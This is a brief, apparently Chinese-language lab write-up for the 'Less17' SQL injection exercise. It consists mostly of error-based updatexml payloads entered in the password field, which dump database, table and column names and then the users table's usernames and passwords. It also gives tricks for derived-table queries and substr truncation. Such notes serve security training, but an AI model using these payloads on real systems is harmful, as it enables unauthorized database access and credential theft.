Less17

username做了检测需要正确的才能通过

只能在正确的用户名的password使用报错注入

模拟注册注入

' or updatexml(1,concat(0x7e,(select database()),0x7e),1)#

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)#

' or updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1)#


' or updatexml(1,concat(0x7e,(select group_concat(id,username,password) from users),0x7e),1)#

You can't specify target table 'users' for update in FROM clause
常规会报不能直接爆数据
可以先用一个表暂存从 users 表中取出所有数据的查询，然后再从这个暂存的表中取出数据
' or updatexml(1,concat(0x7e,(select group_concat(id,username,password) from (select id,username,password from users)a),0x7e),1)#
只能有一个group_concat，只能在查询的最外层
' or updatexml(1,substr(concat(0x7e,(select group_concat(id,username,password) from (select id,username,password from users)a),0x7e),32),1)#